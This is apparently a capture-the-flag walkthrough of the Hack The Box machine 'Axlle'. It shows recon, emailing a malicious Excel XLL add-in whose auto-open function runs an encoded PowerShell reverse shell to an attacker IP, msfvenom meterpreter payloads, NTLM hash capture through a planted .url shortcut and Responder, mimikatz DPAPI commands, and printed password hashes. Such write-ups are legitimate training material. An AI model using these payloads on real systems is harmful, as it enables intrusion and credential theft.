Axxle
Recon
On http webapp we see accounts@axlle.htb email, add it to /etc/hosts
└─$ grep axl /etc/hosts
10.10.11.21 axlle.htb mainframe.axlle.htb hostmaster.axlle.htbDNS (53)
└─$ dig any axlle.htb @10.10.11.21
; <<>> DiG 9.19.21-1-Debian <<>> any axlle.htb @10.10.11.21
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9957
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 4
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;axlle.htb. IN ANY
;; ANSWER SECTION:
axlle.htb. 600 IN A 10.10.11.21
axlle.htb. 3600 IN NS mainframe.axlle.htb.
axlle.htb. 3600 IN SOA mainframe.axlle.htb. hostmaster.axlle.htb. 261 900 600 86400 3600
axlle.htb. 600 IN AAAA dead:beef::aa32:c39e:cbe5:7d67
axlle.htb. 600 IN AAAA dead:beef::1de
;; ADDITIONAL SECTION:
mainframe.axlle.htb. 3600 IN A 10.10.11.21
mainframe.axlle.htb. 3600 IN AAAA dead:beef::1de
mainframe.axlle.htb. 3600 IN AAAA dead:beef::aa32:c39e:cbe5:7d67
;; Query time: 159 msec
;; SERVER: 10.10.11.21#53(10.10.11.21) (TCP)
;; WHEN: Sun Jun 23 04:54:41 EDT 2024
;; MSG SIZE rcvd: 253SMB
We are not able to enumerate the smb via null or default usernames.
└─$ addr=axlle.htb; enum4linux "$addr" | tee enum4linux.log
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Jun 23 05:02:41 2024
=========================================( Target Information )=========================================
Target ........... axlle.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=============================( Enumerating Workgroup/Domain on axlle.htb )=============================
[E] Can't find workgroup/domain
=================================( Nbtstat Information for axlle.htb )=================================
Looking up status of 10.10.11.21
No reply from 10.10.11.21
=====================================( Session Check on axlle.htb )=====================================
[+] Server axlle.htb allows sessions using username '', password ''
==================================( Getting domain SID for axlle.htb )==================================
Domain Name: AXLLE
Domain Sid: S-1-5-21-1005535646-190407494-3473065389
[+] Host is part of a domain (not a workgroup)
====================================( OS information on axlle.htb )====================================
[E] Can't get OS info with smbclient
[+] Got OS info for axlle.htb from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=========================================( Users on axlle.htb )=========================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
===================================( Share Enumeration on axlle.htb )===================================
do_connect: Connection to axlle.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on axlle.htb
=============================( Password Policy Information for axlle.htb )=============================
[E] Unexpected error from polenum:
[+] Attaching to axlle.htb using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:AXLLE.HTB)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
========================================( Groups on axlle.htb )========================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
====================( Users on axlle.htb via RID cycling (RIDS: 500-550,1000-1050) )====================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
=================================( Getting printer info for axlle.htb )=================================
Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT
enum4linux complete on Sun Jun 23 05:06:34 2024HTTP (80)
Backend is IIS webserver.
└─$ curl http://axlle.htb/ -I
HTTP/1.1 200 OK
...
Server: Microsoft-IIS/10.0
Date: Sun, 23 Jun 2024 08:48:27 GMT Excel
Reading:
It looks like we can only send Excel documents but they may not contain macros.
I was first using https://github.com/0xflagplz/Xll-Payload-Generator tool to generate
Testing stage:
└─$ msfvenom --platform windows --arch x64 -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -b '\x00\x0A\x0D' -f raw -o test.bin
Found 2 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 319 (iteration=0)
x64/xor chosen with final size 319
Payload size: 319 bytes
Saved as: test.bin
## Credits: https://stackoverflow.com/a/72784177The testing stage worked, yay! Then I experimented on connection and it worked!
└─$ msfvenom --platform windows --arch x64 -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.16.75 LPORT=4444 EXITFUNC=thread -b '\x00\x0A\x0D' -f raw -o shell.bin
Found 2 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor failed with A key could not be found for the XOR Encoder encoder.
Attempting to encode payload with 1 iterations of x64/xor_dynamic
x64/xor_dynamic succeeded with size 202552 (iteration=0)
x64/xor_dynamic chosen with final size 202552
Payload size: 202552 bytes
Saved as: shell.binBut when I was sending the email to the user I was getting nothing back!
## Windows
➜ mkdir temp; py .\XllGen.py -i .\shell.bin -o shell.xll
Directory: ~\VBoxShare\Xll-Payload-Generator
@achocolatechippancake
@bobby4111
Successfully wrote unencrypted data to 'temp/main.cpp'
Generated code saved to 'temp/main.cpp'
Templates written to 'temp'
Successfully compiled to 'shell.xll'
Cleanup: 'temp' folder and its contents removed successfully.
---
## Linux
└─$ swaks --to accounts@axlle.htb --from pwn@axlle.htb --header "Subject: Cat pictures" --body "uwu" --attach @./shell.xllAfter some trial and error other tool was suggested to use https://github.com/moohax/xllpoc. Clone the project, download shit ton of c++ stuff, with sdk, edit XLL_POC.cpp
##include "stdafx.h"
##include <cstdlib>
##include <fstream>
##include <iostream>
short __stdcall xlAutoOpen()
{
system("powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4ANwA1ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==");
return 0;
}The project generates XLL_POC.dll which you should rename to XLL_POC.xll, since xll files are essentially dll files...
Reverse Shell (gideon.hamill)
PS C:\> whoami /all
USER INFORMATION
----------------
User Name SID
=================== =============================================
axlle\gideon.hamill S-1-5-21-1005535646-190407494-3473065389-1113
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
AXLLE\Accounts Group S-1-5-21-1005535646-190407494-3473065389-1104 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees Group S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.Upgrade shell with ConPtyShell for more stability and run winpeas to enumerate the system.
...
╔══════════╣ UAC Status
╚ If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
EnableLUA: 1
LocalAccountTokenFilterPolicy:
FilterAdministratorToken:
[*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
[-] Only the RID-500 local admin account can be used for lateral movement.
╔══════════╣ PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.20348.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\gideon.hamill\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 319B
...
╔══════════╣ Drives Information
╚ Remember that you should search more info inside the other drives
C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 2 GB)(Permissions: Users [AppendData/CreateDirectories])
...
╔══════════╣ Checking KrbRelayUp
╚ https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#krbrelayup
The system is inside a domain (AXLLE) so it could be vulnerable.
╚ You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges
...
╔══════════╣ Home folders found
C:\Users\Administrator
C:\Users\All Users
C:\Users\baz.humphries
C:\Users\brad.shaw : Accounts [AllAccess]
C:\Users\calum.scott
C:\Users\dallon.matrix
C:\Users\dan.kendo
C:\Users\Default
C:\Users\Default User
C:\Users\gideon.hamill : Accounts [AllAccess], gideon.hamill [AllAccess]
C:\Users\jacob.greeny
C:\Users\lindsay.richards : Accounts [AllAccess]
C:\Users\Public : Interactive [WriteData/CreateFiles]
C:\Users\simon.smalls : Accounts [AllAccess]
C:\Users\trent.langdon
...
════════════════════════════════════╣ Processes Information ╠════════════════════════════════════
╔══════════╣ Interesting Processes -non Microsoft-
╚ Check if any interesting processes for memory dump or if you could overwrite some binary running https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes
...
rundll32(8132)[C:\Windows\system32\rundll32.exe]
Command Line: "C:\Windows\system32\rundll32.exe" c:\windows\system32\ieframe.dll,OpenURL C:\inetpub\testing\priv.url
=================================================================================================
xllrunner(2112)[C:\program files\microsoft office\xllrunner\xllrunner.exe] -- POwn: gideon.hamill
Command Line: "C:\program files\microsoft office\xllrunner\xllrunner.exe" "C:\Program Files (x86)\hMailServer\Data\axlle.htb\Attachments\240620240144597341-XLL_POC_4445.xll"
=================================================================================================
...
╔══════════╣ Modifiable Services
╚ Check if you can modify any service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
LOOKS LIKE YOU CAN MODIFY OR START/STOP SOME SERVICE/s:
RmSvc: GenericExecute (Start/Stop)
ConsentUxUserSvc_7b331: GenericExecute (Start/Stop)
CredentialEnrollmentManagerUserSvc_7b331: GenericExecute (Start/Stop)
DeviceAssociationBrokerSvc_7b331: GenericExecute (Start/Stop)
DevicePickerUserSvc_7b331: GenericExecute (Start/Stop)
DevicesFlowUserSvc_7b331: GenericExecute (Start/Stop)
PimIndexMaintenanceSvc_7b331: GenericExecute (Start/Stop)
PrintWorkflowUserSvc_7b331: GenericExecute (Start/Stop)
UdkUserSvc_7b331: GenericExecute (Start/Stop)
UnistoreSvc_7b331: GenericExecute (Start/Stop)
UserDataSvc_7b331: GenericExecute (Start/Stop)
WpnUserService_7b331: GenericExecute (Start/Stop)
...
╔══════════╣ Autorun Applications
╚ Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries
Folder: C:\windows\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]
=================================================================================================
Folder: C:\windows\system32\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]
...
╔══════════╣ Network Shares
ADMIN$ (Path: C:\Windows)
C$ (Path: C:\)
IPC$ (Path: )
NETLOGON (Path: C:\Windows\SYSVOL\sysvol\axlle.htb\SCRIPTS)
SYSVOL (Path: C:\Windows\SYSVOL\sysvol)
WebTesting (Path: C:\inetpub\testing) -- Permissions: AllAccess
...
╔══════════╣ Checking for DPAPI Master Keys
╚ https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
MasterKey: C:\Users\gideon.hamill\AppData\Roaming\Microsoft\Protect\S-1-5-21-1005535646-190407494-3473065389-1113\2e7f95b7-6930-479a-8df8-ac59abbd261b
Accessed: 6/24/2024 3:06:28 AM
Modified: 6/24/2024 3:06:28 AM
=================================================================================================
MasterKey: C:\Users\gideon.hamill\AppData\Roaming\Microsoft\Protect\S-1-5-21-1005535646-190407494-3473065389-1113\52d1fa8c-4ee4-4b10-940b-ee2bf2d59939
Accessed: 1/1/2024 4:15:54 AM
Modified: 1/1/2024 4:15:54 AM
=================================================================================================
...
╔══════════╣ Checking for DPAPI Credential Files
╚ https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
CredFile: C:\Users\gideon.hamill\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
Description: Local Credential Data
MasterKey: 52d1fa8c-4ee4-4b10-940b-ee2bf2d59939
Accessed: 1/1/2024 4:15:54 AM
Modified: 1/1/2024 4:15:54 AM
Size: 11020
=================================================================================================
...
╔══════════╣ Enumerating Security Packages Credentials
Version: NetNTLMv2
Hash: gideon.hamill::AXLLE:1122334455667788:5a5b49070972a5db7aa3c10b497f7760:010100000000000024aa2a2e1ec6da01eb453b8b74c2d6eb0000000008003000300000000000000001000000002000007497a60d8d2660dd079bf7317352d7a79db9a54158fe4ab254d152e774131d730a00100000000000000000000000000000000000090000000000000000000000
...
════════════════════════════════════╣ File Analysis ╠════════════════════════════════════
╔══════════╣ Found PHP_files Files
File: C:\Program Files (x86)\hMailServer\PHPWebAdmin\config-dist.php
...winpeas showed useful information for us to explore. First I visited hMailServer. Password may come in handy for something?
PS C:\Program Files (x86)\hMailServer\bin> cat hMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=52a1b2a1211e690998e0d2ccb653ff22
[Database]
Type=MSSQLCE
Username=
Password=52abe4d2e16269ddddf7b166218e92d9
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1Command to list the shares:
PS C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5> Get-SmbShare
Name ScopeName Path Description
---- --------- ---- -----------
ADMIN$ * C:\Windows Remote Admin
C$ * C:\ Default share
IPC$ * Remote IPC
NETLOGON * C:\Windows\SYSVOL\sysvol\axlle.htb\SCRIPTS Logon server share
SYSVOL * C:\Windows\SYSVOL\sysvol Logon server share
WebTesting * C:\inetpub\testingCouldn't get passwor via dpapi cache
mimikatz # dpapi::masterkey /in:.\2e7f95b7-6930-479a-8df8-ac59abbd261b /rpc
mimikatz # dpapi::masterkey /in:.\52d1fa8c-4ee4-4b10-940b-ee2bf2d59939 /rpc
mimikatz # dpapi::cache
mimikatz # dpapi::cred /in:C:\Users\gideon.hamill\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D
...
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 00002a46 - 10822
credUnk0 : 00000000 - 0
Type : 00000001 - 1 - generic
Flags : 00000000 - 0
LastWritten : 1/1/2024 12:15:54 PM
unkFlagsOrSize : 00000000 - 0
Persist : 00000002 - 2 - local_machine
AttributeCount : 00000020 - 32
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : WindowsLive:target=virtualapp/didlogical
UnkData : (null)
Comment : PersistedCredential
TargetAlias : (null)
UserName : 02ibadauxfvernpc
CredentialBlob :
Attributes : 32
...Enumerate groups:
PS C:\users\public> Get-ADGroup -Properties * -Identity Accounts
CanonicalName : axlle.htb/Users/`Accounts`
CN : Accounts
Created : 1/1/2024 3:34:49 AM
createTimeStamp : 1/1/2024 3:34:49 AM
Deleted :
Description : Account Managers
DisplayName : Accounts
DistinguishedName : CN=Accounts,CN=Users,DC=axlle,DC=htb
dSCorePropagationData : {1/2/2024 6:35:21 AM, 1/2/2024 6:26:06 AM, 1/2/2024 6:06:50 AM, 1/1/2024 8:08:07 AM...}
GroupCategory : Security
GroupScope : Global
groupType : -2147483646
HomePage :
instanceType : 4
isDeleted :
LastKnownParent :
ManagedBy :
member : {CN=Lindsay Richards,DC=axlle,DC=htb, CN=Simon Smalls,DC=axlle,DC=htb, CN=Gideon Hamill,DC=axlle,DC=htb, CN=Brad Shaw,DC=axlle,DC=htb}
MemberOf : {CN=Employees,CN=Users,DC=axlle,DC=htb}
Members : {CN=Lindsay Richards,DC=axlle,DC=htb, CN=Simon Smalls,DC=axlle,DC=htb, CN=Gideon Hamill,DC=axlle,DC=htb, CN=Brad Shaw,DC=axlle,DC=htb}
Modified : 1/2/2024 6:35:21 AM
modifyTimeStamp : 1/2/2024 6:35:21 AM
Name : Accounts
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory : CN=Group,CN=Schema,CN=Configuration,DC=axlle,DC=htb
ObjectClass : group
ObjectGUID : 2eeaf150-6c9d-4cea-944b-109ce7197596
objectSid : S-1-5-21-1005535646-190407494-3473065389-1104
ProtectedFromAccidentalDeletion : False
SamAccountName : Accounts
sAMAccountType : 268435456
sDRightsEffective : 0
SID : S-1-5-21-1005535646-190407494-3473065389-1104
SIDHistory : {}
uSNChanged : 41252
uSNCreated : 12791
whenChanged : 1/2/2024 6:35:21 AM
whenCreated : 1/1/2024 3:34:49 AM
PS C:\users\public> Get-ADGroup -Properties * -Identity Employees
CanonicalName : axlle.htb/Users/Employees
CN : Employees
Created : 1/1/2024 3:34:49 AM
createTimeStamp : 1/1/2024 3:34:49 AM
Deleted :
Description : Employees of Axlle Corp
DisplayName : Employees
DistinguishedName : CN=Employees,CN=Users,DC=axlle,DC=htb
dSCorePropagationData : {1/2/2024 6:34:14 AM, 1/2/2024 6:26:06 AM, 1/2/2024 6:04:46 AM, 1/1/2024 8:08:07 AM...}
GroupCategory : Security
GroupScope : Global
groupType : -2147483646
HomePage :
instanceType : 4
isDeleted :
LastKnownParent :
ManagedBy :
member : {CN=Web Devs,CN=Users,DC=axlle,DC=htb, CN=App Devs,CN=Users,DC=axlle,DC=htb, CN=Sales,CN=Users,DC=axlle,DC=htb, CN=HR,CN=Users,DC=axlle,DC=htb...}
MemberOf : {}
Members : {CN=Web Devs,CN=Users,DC=axlle,DC=htb, CN=App Devs,CN=Users,DC=axlle,DC=htb, CN=Sales,CN=Users,DC=axlle,DC=htb, CN=HR,CN=Users,DC=axlle,DC=htb...}
Modified : 1/2/2024 6:34:14 AM
modifyTimeStamp : 1/2/2024 6:34:14 AM
Name : Employees
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory : CN=Group,CN=Schema,CN=Configuration,DC=axlle,DC=htb
ObjectClass : group
ObjectGUID : b03a8fbd-02c5-484e-8390-80b9a425818d
objectSid : S-1-5-21-1005535646-190407494-3473065389-1103
ProtectedFromAccidentalDeletion : False
SamAccountName : Employees
sAMAccountType : 268435456
sDRightsEffective : 0
SID : S-1-5-21-1005535646-190407494-3473065389-1103
SIDHistory : {}
uSNChanged : 41239
uSNCreated : 12787
whenChanged : 1/2/2024 6:34:14 AM
whenCreated : 1/1/2024 3:34:49 AMWe are parts of Accounts and Employees group, accounts seems to be Managers.
List connections and process names:
PS C:\Users\gideon.hamill> Get-NetTCPConnection -State Listen | % { $name=(Get-Process -Id $_.OwningProcess).ProcessName; $_ | Add-Member -MemberType NoteProperty -Name ProcessName -Value $name; $_ } | Format-Table -Property LocalAddress, LocalPort, RemoteAddress, RemotePort, State, ProcessName -AutoSizeStill nothing eye catching....
Privilege Escalation (dallon.matrix)
OSINT Testing
Okay, finally I decided to view where the xll were stored and surprise surprise!
PS C:\Program Files (x86)\hMailServer\Data\axlle.htb> tree /f
Folder PATH listing
Volume serial number is BFF7-F940
C:.
├───accounts
├───Attachments
│ 240620241208526673-shell.xll
│
├───dallon.matrix
│ └───2F
│ {2F7523BD-628F-4359-913E-A873FCC59D0F}.eml
│
└───ReviewedAttachments
240620241205223704-HelloWorldXll.xll
240620241206194486-HelloWorldXll.xll
240620241207403860-XLL_POC_4445.xll
PS C:\Program Files (x86)\hMailServer\Data\axlle.htb> cat '.\dallon.matrix\2F\{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml'
Return-Path: webdevs@axlle.htb
Received: from bumbag (Unknown [192.168.77.153])
by MAINFRAME with ESMTP
; Mon, 1 Jan 2024 06:32:24 -0800
Date: Tue, 02 Jan 2024 01:32:23 +1100
To: dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb
From: webdevs@axlle.htb
Subject: OSINT Application Testing
Message-Id: <20240102013223.019081@bumbag>
X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
Hi everyone,
The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.
We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.
Yours in click-worthy URLs,
The Web Dev TeamSave usernames for later just in case.
└─$ echo 'dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb'| tr ',' '\n' > usernames.tld.txt
└─$ echo 'dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb'| tr ',' '\n' | cut -d '@' -f 1 > usernames.txtCreate the file
PS C:\inetpub\testing> echo "[InternetShortcut]`nURL=\\\\10.10.16.75\\uwu" > test.urlMeanwhile start responder:
└─$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
...
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.21
[SMB] NTLMv2-SSP Username : AXLLE\dallon.matrix
[SMB] NTLMv2-SSP Hash : dallon.matrix::AXLLE:469b53838a03ba79:99AD2B9C699BBD738CBFEC1B4A591C10:010100000000000080E5450494C6DA015DB7361262613D3800000000020008004D0042004D00350001001E00570049004E002D004800500045004C0059004B00440049004B005100580004003400570049004E002D004800500045004C0059004B00440049004B00510058002E004D0042004D0035002E004C004F00430041004C00030014004D0042004D0035002E004C004F00430041004C00050014004D0042004D0035002E004C004F00430041004C000700080080E5450494C6DA01060004000200000008003000300000000000000001000000002000000A92CA5BDC9AC41ECE605A1D1836CDEC16A3AEA9A3BBE994E3B82559236ACFFB0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00370035000000000000000000
[*] Skipping previously captured hash for AXLLE\dallon.matrix
[*] Skipping previously captured hash for AXLLE\dallon.matrix
...User.txt
Well hash couldn't be cracked with rockyou. Turns out you can also open files with file:// protocol, so let's get a reverse shell:
PS C:\inetpub\testing> echo "[InternetShortcut]`nURL=file:///Users/Public/rev.exe" > test.url
---
meterpreter > getuid
Server username: AXLLE\dallon.matrix
meterpreter > shell
Process 4372 created.
Channel 2 created.
Microsoft Windows [Version 10.0.20348.2527]
(c) Microsoft Corporation. All rights reserved.
C:\>cd %USERPROFILE%
C:\Users\dallon.matrix>tree /f
tree /f
Folder PATH listing
Volume serial number is BFF7-F940
C:.
+---Desktop
user.txt
C:\Users\dallon.matrix>type .\Desktop\user.txt
d25c2eb60aa5df291c86f643086c4b87Privilege Escalation (jacob.greeny)
The user is part of Web Devs which means we should have access to some development features.
C:\Users\dallon.matrix>whoami /all
User Name SID
=================== =============================================
axlle\dallon.matrix S-1-5-21-1005535646-190407494-3473065389-1125
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
AXLLE\Web Devs Group S-1-5-21-1005535646-190407494-3473065389-1127 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees Group S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\Users\dallon.matrix>powershell
PS C:\> Get-ADGroup -Properties * -Identity 'Web Devs'
CanonicalName : axlle.htb/Users/Web Devs
CN : Web Devs
Created : 1/2/2024 5:42:37 AM
createTimeStamp : 1/2/2024 5:42:37 AM
Deleted :
Description : Web Wizards
DisplayName : Web Devs
DistinguishedName : CN=Web Devs,CN=Users,DC=axlle,DC=htb
dSCorePropagationData : {1/2/2024 6:33:15 AM, 1/2/2024 6:26:06 AM, 1/2/2024 6:02:13 AM, 12/31/1600 4:00:00 PM}
GroupCategory : Security
GroupScope : Global
groupType : -2147483646
HomePage :
instanceType : 4
isDeleted :
LastKnownParent :
ManagedBy :
member : {CN=Dallon Matrix,DC=axlle,DC=htb, CN=Calum Scott,DC=axlle,DC=htb, CN=Dan Kendo,DC=axlle,DC=htb, CN=Trent Langdon,DC=axlle,DC=htb}
